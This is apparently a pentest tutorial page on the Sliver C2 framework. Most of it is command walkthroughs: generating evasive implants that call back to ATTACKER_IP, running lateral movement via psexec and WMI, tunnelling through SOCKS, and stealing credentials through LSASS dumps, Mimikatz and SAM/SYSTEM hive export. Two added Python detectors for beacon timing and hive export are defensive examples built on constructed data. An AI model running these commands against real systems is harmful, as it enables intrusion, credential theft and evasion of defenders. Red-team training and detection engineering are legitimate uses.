C2 with Sliver
Introduction to Sliver C2 framework for AD engagements: server setup, listener configuration, implant generation, session management, lateral movement modules, SOCKS tunneling, multiplayer operations, and armory extensions.
Sliver is an open-source C2 framework written in Go. It supports multiple callback protocols (mTLS, WireGuard, HTTP/S, DNS), generates cross-platform implants, and includes built-in lateral movement, credential dumping, and pivoting modules.
Installation
# Linux — official install script
curl https://sliver.sh/install | sudo bash
# Or build from source
git clone https://github.com/BishopFox/sliver.git
cd sliver && make
# Start the Sliver server
sliver-server
# Connect with the client
sliver-client
Listeners
Sliver uses listeners (server-side) that implants call back to.
sliver > mtls # mTLS — encrypted by default, no SNI
sliver > https # HTTPS (needs --domain for staging)
sliver > http # HTTP (cleartext — avoid in production)
sliver > dns # DNS C2 (stealthy, slow)
sliver > wireguard # WireGuard-based C2
Start an mTLS listener
sliver > mtls --lport 8888
[*] Starting mTLS listener ...
[*] Successfully started job #1
Start an HTTPS listener
sliver > https --lport 443 --domain c2.corp.example.com
[*] Starting HTTPS listener ...
Implant Generation
Session-based implant (interactive — persistent connection)
sliver > generate --mtls ATTACKER_IP:8888 --os windows --arch amd64 --format exe --save /tmp/
sliver > generate --mtls ATTACKER_IP:8888 --os linux --arch amd64 --format elf --save /tmp/
# With evasion options
sliver > generate --mtls ATTACKER_IP:8888 --os windows --arch amd64 \
--format exe --skip-symbols --evasion --save /tmp/
Beacon-based implant (async — checks in at intervals — stealthier)
sliver > generate beacon --mtls ATTACKER_IP:8888 --seconds 30 --jitter 15 \
--os windows --arch amd64 --format exe --save /tmp/
# HTTPS beacon
sliver > generate beacon --https ATTACKER_IP:443 --seconds 60 --jitter 20 \
--os windows --arch amd64 --format exe --save /tmp/
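A defender-side check for the beacon timing shown above, added here as an example; it is not part of Sliver or of the original page. It flags host pairs whose connection gaps fit an interval-plus-jitter pattern such as `--seconds 30 --jitter 15`, assuming each check-in sleeps for the interval plus a random amount up to the jitter; the flow records, host names and IP addresses are constructed.

```python
from collections import defaultdict
from itertools import accumulate

def beacon_candidates(flows, min_events=8, max_spread=0.6, min_fit=0.85):
    """Flag (src, dst, port) tuples whose connection gaps sit in a narrow
    [base, base * (1 + max_spread)] window, as interval-plus-jitter sleeps do.
    Returns {(src, dst, port): (base_seconds, observed_jitter_seconds)}."""
    by_pair = defaultdict(list)
    for ts, src, dst, port in flows:
        by_pair[(src, dst, port)].append(ts)

    hits = {}
    for pair, stamps in by_pair.items():
        if len(stamps) < min_events:
            continue  # too few connections to judge periodicity
        stamps.sort()
        gaps = [b - a for a, b in zip(stamps, stamps[1:])]
        base = min(gaps)
        if base <= 0:
            continue  # simultaneous connections, not a sleep loop
        in_window = [g for g in gaps if g <= base * (1 + max_spread)]
        # A missed check-in shows up as one long gap; tolerate a few of them.
        if len(in_window) / len(gaps) >= min_fit:
            hits[pair] = (base, max(in_window) - base)
    return hits

def _flows(start, gaps, src, dst, port):
    # Build constructed flow records from a start time and a list of gaps.
    return [(t, src, dst, port) for t in accumulate(gaps, initial=start)]

# Constructed sample data: host names, IPs and timings are made up.
SAMPLE_FLOWS = (
    # Gaps of 30-45 s (assumed shape of --seconds 30 --jitter 15),
    # with one missed check-in (71 s).
    _flows(1_700_000_000, [31, 44, 37, 30, 42, 35, 39, 33, 71, 36, 40, 32],
           "WS-014", "203.0.113.10", 8888)
    # Interactive browsing: short bursts and long idle periods.
    + _flows(1_700_000_000, [2, 190, 5, 640, 12, 75, 3, 1200, 8, 410],
             "WS-020", "198.51.100.7", 443)
)

if __name__ == "__main__":
    for pair, (base, jitter) in beacon_candidates(SAMPLE_FLOWS).items():
        print(pair, f"interval~{base}s jitter~{jitter}s")
```

Feed it flow or proxy records grouped per source host; the thresholds are starting points to tune against the network's normal periodic traffic (update checks, telemetry).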
Shellcode / DLL output
sliver > generate --mtls ATTACKER_IP:8888 --os windows --arch amd64 --format shellcode
sliver > generate --mtls ATTACKER_IP:8888 --os windows --arch amd64 --format shared
Session Management
# List active sessions/beacons
sliver > sessions
sliver > beacons
# Interact with a session (by ID or name)
sliver > use SESSION_ID
sliver (IMPLANT_NAME) >
# Interact with a beacon
sliver > use BEACON_ID
sliver (BEACON_NAME) >
# Background current session
sliver (IMPLANT_NAME) > background
# Kill a session
sliver > kill SESSION_ID
Basic Commands in a Session
# System info
sliver (NAME) > info
sliver (NAME) > getuid
sliver (NAME) > getpid
sliver (NAME) > getgid
sliver (NAME) > whoami
# File system
sliver (NAME) > ls
sliver (NAME) > ls /tmp
sliver (NAME) > cat /etc/passwd
sliver (NAME) > download /tmp/file.txt
sliver (NAME) > upload /local/file.exe C:\\Temp\\file.exe
sliver (NAME) > cd C:\\Windows\\Temp
# Process management
sliver (NAME) > ps
sliver (NAME) > kill PID
# Shell
sliver (NAME) > shell # interactive shell (noisy)
sliver (NAME) > execute -t 60 cmd.exe /c whoami
sliver (NAME) > execute-assembly SharpHound.exe -- -c All # run .NET assembly
Lateral Movement
psexec (SMB-based)
sliver (NAME) > psexec --profile win-session TARGET_IP
The profile passed to --profile must already exist, so create it first:
sliver > profiles new --mtls ATTACKER_IP:8888 --os windows --arch amd64 --format service win-session
WMI execution
sliver (NAME) > wmiexec --username DOMAIN\\user --password pass TARGET_IP
Generate a one-off implant for a specific host
sliver > generate --mtls ATTACKER_IP:8888 --os windows --arch amd64 --format exe
# Drop it on TARGET_IP and execute
Port Forwarding / SOCKS5 Pivot
# Forward local port to remote host:port through implant
sliver (NAME) > portfwd add --remote TARGET_IP:3389
# SOCKS5 proxy through implant
sliver (NAME) > socks5 start --host 127.0.0.1 --port 1080
# Then: proxychains nxc smb INTERNAL_IP -u user -p pass
# Reverse port forward (remote → attacker)
sliver (NAME) > rportfwd add --bind-addr 0.0.0.0:8080 --forward-addr 127.0.0.1:80
Credential Operations
# Dump LSASS (requires admin / SeDebugPrivilege)
sliver (NAME) > procdump --pid PID_OF_LSASS
# Run Mimikatz via execute-assembly
sliver (NAME) > execute-assembly Mimikatz.exe -- "sekurlsa::logonpasswords" "exit"
# SharpDPAPI
sliver (NAME) > execute-assembly SharpDPAPI.exe -- credentials
# SAM dump via reg save
sliver (NAME) > execute -t 30 cmd.exe /c "reg save HKLM\SAM C:\Temp\sam.hive"
sliver (NAME) > execute -t 30 cmd.exe /c "reg save HKLM\SYSTEM C:\Temp\system.hive"
sliver (NAME) > download C:\\Temp\\sam.hive
sliver (NAME) > download C:\\Temp\\system.hive
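Detection logic for the `reg save` hive export above, added here as an example and not taken from the original page. It scans process-creation command lines (the kind recorded by Windows event 4688 or Sysmon event 1) and alerts when one host saves SYSTEM together with SAM or SECURITY inside a short window, since the SYSTEM hive holds the boot key needed to decrypt the other two; the event tuples and host names are constructed.

```python
import re

# Matches reg / reg.exe "save" of the SAM, SYSTEM or SECURITY hive,
# with either the HKLM or HKEY_LOCAL_MACHINE spelling, in any case.
HIVE_SAVE = re.compile(
    r'\breg(?:\.exe)?"?\s+save\s+"?(?:HKLM|HKEY_LOCAL_MACHINE)\\(SAM|SYSTEM|SECURITY)\b',
    re.IGNORECASE,
)

def hive_dump_hosts(events, window=300):
    """events: iterable of (epoch_seconds, host, command_line).
    Returns {host: [hives saved within `window` seconds]} for hosts that
    exported SYSTEM plus SAM or SECURITY close together."""
    last_seen = {}   # host -> {hive: time of latest save}
    alerts = {}
    for ts, host, cmd in sorted(events):
        match = HIVE_SAVE.search(cmd)
        if not match:
            continue
        hives = last_seen.setdefault(host, {})
        hives[match.group(1).upper()] = ts
        recent = {h for h, t in hives.items() if ts - t <= window}
        # A lone SYSTEM save can be a backup job; the pairing is the signal.
        if "SYSTEM" in recent and recent & {"SAM", "SECURITY"}:
            alerts.setdefault(host, sorted(recent))
    return alerts

# Constructed sample events (not real logs).
SAMPLE_EVENTS = [
    (1000, "WS-014", r'cmd.exe /c "reg save HKLM\SAM C:\Temp\sam.hive"'),
    (1004, "WS-014", r'cmd.exe /c "reg save HKLM\SYSTEM C:\Temp\system.hive"'),
    (2000, "SRV-02", r'reg.exe save HKLM\SYSTEM D:\backup\system.bak'),   # SYSTEM only
    (2100, "WS-020", r'reg.exe query HKLM\SAM'),                          # query, not save
    (3000, "WS-031", r'REG  SAVE "hkey_local_machine\sam" C:\out1'),
    (3900, "WS-031", r'reg save hklm\system C:\out2'),                    # 900 s later
]

if __name__ == "__main__":
    for host, hives in hive_dump_hosts(SAMPLE_EVENTS).items():
        print(f"ALERT {host}: registry hive export {hives}")
```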
Armory — Extensions & BOFs
Sliver’s armory provides BOFs (Beacon Object Files) and C# tools:
# Install armory
sliver > armory install all
# List available packages
sliver > armory search
# Install specific package
sliver > armory install bloodhound-bot
sliver > armory install sharp-hound
# Run a BOF
sliver (NAME) > bof whoami
sliver (NAME) > bof netshareenum TARGET_IP
# Run Seatbelt (recon tool)
sliver (NAME) > execute-assembly Seatbelt.exe -- -group=user
Multiplayer Mode
Sliver supports multiple operators working against the same targets:
# Create operator certificate on server
sliver-server operator --name pentest-team --lhost SERVER_IP --save /tmp/pentest-team.cfg
# Connect as operator
sliver-client import /tmp/pentest-team.cfg
sliver-client
All operators share sessions, beacons, and implants.
Evasion Options
# Skip debug symbols (smaller binary)
--skip-symbols
# Enable evasion (anti-analysis checks)
--evasion
# Limit to one execution (implant self-destructs after first run)
--limit-singleton
# Canary domains (detects sandbox via DNS)
--canary sandbox.example.com
# Obfuscate strings at compile time
--obfuscate
# Custom implant name
--name "WindowsUpdate"
Quick Reference
| Command | Purpose |
|---|---|
| mtls | Start mTLS listener |
| generate | Build session implant |
| generate beacon | Build async beacon implant |
| sessions | List active sessions |
| beacons | List active beacons |
| use | Interact with session/beacon |
| execute | Run OS command |
| execute-assembly | Run .NET assembly in memory |
| psexec | Lateral movement via SMB service |
| socks5 start | SOCKS5 proxy through implant |
| portfwd add | Port forward through implant |
| procdump | Dump process memory |
| download / upload | File transfer |
| armory install | Install BOFs/extensions |